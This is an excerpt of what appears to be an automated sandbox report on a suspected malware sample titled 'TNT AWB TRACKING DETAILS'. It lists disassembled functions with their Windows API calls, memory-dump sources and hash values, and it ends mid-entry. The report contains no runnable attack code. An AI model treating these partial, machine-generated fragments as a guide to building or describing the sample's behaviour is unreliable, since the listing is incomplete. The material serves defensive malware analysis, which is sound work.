                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F24FEC
                                                    • SetActiveWindow.USER32 ref: 00F2500B
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F25019
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F25038
                                                    • Sleep.KERNEL32(000000FA), ref: 00F25043
                                                    • IsWindow.USER32 ref: 00F2504F
                                                    • EndDialog.USER32(00000000), ref: 00F25060
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                    • String ID: BUTTON
                                                    • API String ID: 1194449130-3405671355
                                                    • Opcode ID: d642f0baafabe99a3d368f84b3d6e31f5daa6b0a0544bc3d8f8f85403824187f
                                                    • Instruction ID: b3bed24ddaee6ad99f362de352e403f197f49d44ab0646cdd2923e3509ec386c
                                                    • Opcode Fuzzy Hash: d642f0baafabe99a3d368f84b3d6e31f5daa6b0a0544bc3d8f8f85403824187f
                                                    • Instruction Fuzzy Hash: 3E21F37460060DEFE7109F60FD88B763B69EB56B55F081024F909C61B5CB718D44B762
                                                    Function 00F2D58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                    • CoInitialize.OLE32(00000000), ref: 00F2D5EA
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F2D67D
                                                    • SHGetDesktopFolder.SHELL32(?), ref: 00F2D691
                                                    • CoCreateInstance.OLE32(00F52D7C,00000000,00000001,00F78C1C,?), ref: 00F2D6DD
                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F2D74C
                                                    • CoTaskMemFree.OLE32(?,?), ref: 00F2D7A4
                                                    • _memset.LIBCMT ref: 00F2D7E1
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00F2D81D
                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F2D840
                                                    • CoTaskMemFree.OLE32(00000000), ref: 00F2D847
                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00F2D87E
                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 00F2D880
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                    • String ID:
                                                    • API String ID: 1246142700-0
                                                    • Opcode ID: 117ab387b9941a14ce23f9a82d27d498a4bd10df1736fe5f1a7308e984e5ed60
                                                    • Instruction ID: f0e88f010674fbc4ae2931749599bb381d5d955b899ead1cb9198dcbcc691ecf
                                                    • Opcode Fuzzy Hash: 117ab387b9941a14ce23f9a82d27d498a4bd10df1736fe5f1a7308e984e5ed60
                                                    • Instruction Fuzzy Hash: 8CB12D75A00119AFDB04DFA4D888EAEBBF9FF48314B148069F809EB261DB31ED45DB50
                                                    Function 00F1C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000001), ref: 00F1C283
                                                    • GetWindowRect.USER32(00000000,?), ref: 00F1C295
                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00F1C2F3
                                                    • GetDlgItem.USER32(?,00000002), ref: 00F1C2FE
                                                    • GetWindowRect.USER32(00000000,?), ref: 00F1C310
                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00F1C364
                                                    • GetDlgItem.USER32(?,000003E9), ref: 00F1C372
                                                    • GetWindowRect.USER32(00000000,?), ref: 00F1C383
                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00F1C3C6
                                                    • GetDlgItem.USER32(?,000003EA), ref: 00F1C3D4
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F1C3F1
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F1C3FE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    • Opcode ID: 8a246ceb605e8d1c66e91decce06b54c133770e8aa22350ce74e6208efbffe31
                                                    • Instruction ID: ea3c0e5a0cb8282c48a53bfcb869516296fab3dd35b60f1041bf65f144fc5c18
                                                    • Opcode Fuzzy Hash: 8a246ceb605e8d1c66e91decce06b54c133770e8aa22350ce74e6208efbffe31
                                                    • Instruction Fuzzy Hash: B9518275F00209AFDB08CFA9DD89AAEBBB6FB98310F14812DF919D7290D7709D449B50
                                                    Function 00EC201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EC2036,?,00000000,?,?,?,?,00EC16CB,00000000,?), ref: 00EC1B9A
                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00EC20D3
                                                    • KillTimer.USER32(-00000001,?,?,?,?,00EC16CB,00000000,?,?,00EC1AE2,?,?), ref: 00EC216E
                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00EFBCA6
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EC16CB,00000000,?,?,00EC1AE2,?,?), ref: 00EFBCD7
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EC16CB,00000000,?,?,00EC1AE2,?,?), ref: 00EFBCEE
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00EC16CB,00000000,?,?,00EC1AE2,?,?), ref: 00EFBD0A
                                                    • DeleteObject.GDI32(00000000), ref: 00EFBD1C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                    • String ID:
                                                    • API String ID: 641708696-0
                                                    • Opcode ID: 7a64f59a6c93f3119f5d453acdb44698af4bc4f1417f212c3f35fc60b2f4460a
                                                    • Instruction ID: 5bdcb86217add69875fb32f78b3487a04debc94a025e77855b6a4f314c617b6a
                                                    • Opcode Fuzzy Hash: 7a64f59a6c93f3119f5d453acdb44698af4bc4f1417f212c3f35fc60b2f4460a
                                                    • Instruction Fuzzy Hash: 9861DF34101A08DFCB359F14CA49B7AB7F1FF4071AF14A52EE642AA570C772A892EF41
                                                    Function 00EC21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00EC25EC
                                                    • GetSysColor.USER32(0000000F), ref: 00EC21D3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ColorLongWindow
                                                    • String ID:
                                                    • API String ID: 259745315-0
                                                    • Opcode ID: 83bb4adb1ed86a0b8f69eb78b67b1fa063dd48199c491e8a97c4c39b3d0e335d
                                                    • Instruction ID: 907cb86d25c3ca8d6740ced60127dba1e5a3efe119fe6ce38fc3c3ec43bdf8ae
                                                    • Opcode Fuzzy Hash: 83bb4adb1ed86a0b8f69eb78b67b1fa063dd48199c491e8a97c4c39b3d0e335d
                                                    • Instruction Fuzzy Hash: 144190351001489BDB299F28EC88FB93B65EB56335F18526DFE65AA1F1C7328C42EB11
                                                    Function 00F2A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?,00F4F910), ref: 00F2A90B
                                                    • GetDriveTypeW.KERNEL32(00000061,00F789A0,00000061), ref: 00F2A9D5
                                                    • _wcscpy.LIBCMT ref: 00F2A9FF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                    • API String ID: 2820617543-1000479233
                                                    • Opcode ID: ba6ee903cd0be304df64d6dbb4cf82f51bb05db89860a6920d2dbdccbf103287
                                                    • Instruction ID: bfc944df997f2507f711a91bc4cf467b8afeedb435dac97331527216146b496c
                                                    • Opcode Fuzzy Hash: ba6ee903cd0be304df64d6dbb4cf82f51bb05db89860a6920d2dbdccbf103287
                                                    • Instruction Fuzzy Hash: FB51EC325083119FC300EF15D992FAFB7E5EF84750F00582DF59A672A2DB31998ADA43
                                                    Function 00EC9837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __i64tow__itow__swprintf
                                                    • String ID: %.15g$0x%p$False$True
                                                    • API String ID: 421087845-2263619337
                                                    • Opcode ID: 3d3763f056cec6b07c4ff1ccfd367df057f6fba8a2ad47ba8c923a7391f8ba0d
                                                    • Instruction ID: 6967b784a93e28604a05e5502c3fb1d812f7f007b3c4526f70452d6f4289cb0b
                                                    • Opcode Fuzzy Hash: 3d3763f056cec6b07c4ff1ccfd367df057f6fba8a2ad47ba8c923a7391f8ba0d
                                                    • Instruction Fuzzy Hash: C841F572500209AFEB28DF34DD46F7A73E8EF05304F20546EE649F7282EA329D428B11
                                                    Function 00F47152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F4716A
                                                    • CreateMenu.USER32 ref: 00F47185
                                                    • SetMenu.USER32(?,00000000), ref: 00F47194
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F47221
                                                    • IsMenu.USER32(?), ref: 00F47237
                                                    • CreatePopupMenu.USER32 ref: 00F47241
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F4726E
                                                    • DrawMenuBar.USER32 ref: 00F47276
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                    • String ID: 0$F
                                                    • API String ID: 176399719-3044882817
                                                    • Opcode ID: 066415fbdecbefc50ebd29aa363877b756b3e09ee39b9840eab19d29ee4f1b41
                                                    • Instruction ID: 2f101c84b6993082cec948e64199a7d578c5687c9fe419fa6f7a9ea1eb56dc4f
                                                    • Opcode Fuzzy Hash: 066415fbdecbefc50ebd29aa363877b756b3e09ee39b9840eab19d29ee4f1b41
                                                    • Instruction Fuzzy Hash: 63416778A01209EFDB10EF64D844E9ABBB5FF49310F140529FD09A7360D771AA14EF90
                                                    Function 00F474BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F4755E
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00F47565
                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F47578
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00F47580
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F4758B
                                                    • DeleteDC.GDI32(00000000), ref: 00F47594
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00F4759E
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F475B2
                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F475BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                    • String ID: static
                                                    • API String ID: 2559357485-2160076837
                                                    • Opcode ID: 42d5db94df4378e147acf96cd12ca08711cb4c01315b5914b6c90ef5bf09e212
                                                    • Instruction ID: 04b7a20a69fe2c2a98c5ce96dde1a24facea3aa976843acd9fc56a2e94505cae
                                                    • Opcode Fuzzy Hash: 42d5db94df4378e147acf96cd12ca08711cb4c01315b5914b6c90ef5bf09e212
                                                    • Instruction Fuzzy Hash: CC316C36505218BFDF11AF64DC08FEA3F69EF1A361F150224FE19A61A0C735D815EBA4
                                                    Function 00EE6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00EE6E3E
                                                      • Part of subcall function 00EE8B28: __getptd_noexit.LIBCMT ref: 00EE8B28
                                                    • __gmtime64_s.LIBCMT ref: 00EE6ED7
                                                    • __gmtime64_s.LIBCMT ref: 00EE6F0D
                                                    • __gmtime64_s.LIBCMT ref: 00EE6F2A
                                                    • __allrem.LIBCMT ref: 00EE6F80
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EE6F9C
                                                    • __allrem.LIBCMT ref: 00EE6FB3
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EE6FD1
                                                    • __allrem.LIBCMT ref: 00EE6FE8
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EE7006
                                                    • __invoke_watson.LIBCMT ref: 00EE7077
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                    • String ID:
                                                    • API String ID: 384356119-0
                                                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                    • Instruction ID: 17cc07d1f4c06d5ad5d9c4b7d84dffa1b2c2d7ecbcc6f4b4fb2b95c5379a37cc
                                                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                    • Instruction Fuzzy Hash: 5771F576A00B5FABD714AE7ADC41B6AB3E8AF14364F146229F554F72C1E770DE008B90
                                                    Function 00F22527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F22542
                                                    • GetMenuItemInfoW.USER32(00F85890,000000FF,00000000,00000030), ref: 00F225A3
                                                    • SetMenuItemInfoW.USER32(00F85890,00000004,00000000,00000030), ref: 00F225D9
                                                    • Sleep.KERNEL32(000001F4), ref: 00F225EB
                                                    • GetMenuItemCount.USER32(?), ref: 00F2262F
                                                    • GetMenuItemID.USER32(?,00000000), ref: 00F2264B
                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00F22675
                                                    • GetMenuItemID.USER32(?,?), ref: 00F226BA
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F22700
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F22714
                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F22735
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                    • String ID:
                                                    • API String ID: 4176008265-0
                                                    • Opcode ID: b06a6ebf63b145d4bd681fede063525fbe963c54392c488b191910d0ed895a66
                                                    • Instruction ID: 00bf1319c1054de2d47c34f750adec81cea033a3c8a74c7bdbd963ea88386b9b
                                                    • Opcode Fuzzy Hash: b06a6ebf63b145d4bd681fede063525fbe963c54392c488b191910d0ed895a66
                                                    • Instruction Fuzzy Hash: 8561CF7590026DBFDB61CFA4EC88EBE7BB8EB02314F184059F841A7250D735AD05EB21
                                                    Function 00F46F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F46FA5
                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F46FA8
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F46FCC
                                                    • _memset.LIBCMT ref: 00F46FDD
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F46FEF
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F47067
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow_memset
                                                    • String ID:
                                                    • API String ID: 830647256-0
                                                    • Opcode ID: 864d07814f9f7c00379cee4b8ac304d7e9c1707cb6e9232f5f5d1529facd6897
                                                    • Instruction ID: d6c226466871cfd3308cbf9df2d090bfdda3174a2075235113284bbc909ad73f
                                                    • Opcode Fuzzy Hash: 864d07814f9f7c00379cee4b8ac304d7e9c1707cb6e9232f5f5d1529facd6897
                                                    • Instruction Fuzzy Hash: 74617B75900248AFDB11DFA8CC81EEE7BF8EB49710F10415AFA14EB2A1D771AD45EB90
                                                    Function 00F16B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F16BBF
                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00F16C18
                                                    • VariantInit.OLEAUT32(?), ref: 00F16C2A
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F16C4A
                                                    • VariantCopy.OLEAUT32(?,?), ref: 00F16C9D
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F16CB1
                                                    • VariantClear.OLEAUT32(?), ref: 00F16CC6
                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00F16CD3
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F16CDC
                                                    • VariantClear.OLEAUT32(?), ref: 00F16CEE
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F16CF9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    • Opcode ID: cfea18b9a90d02b7a47f8b412cc477c2f4632ab2758b066aeb2f8c894d8bd04a
                                                    • Instruction ID: 4fc0357b1d02163cf6e32f4ed5949d9a491dfd572b805eeab076c170f08c94ed
                                                    • Opcode Fuzzy Hash: cfea18b9a90d02b7a47f8b412cc477c2f4632ab2758b066aeb2f8c894d8bd04a
                                                    • Instruction Fuzzy Hash: 0F416035A0021D9FCF04DF68D848DEEBBB9EF58351F008069E955E7261CB35A945DB90
                                                    Function 00F35732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                    Download Yara Rule
                                                    APIs
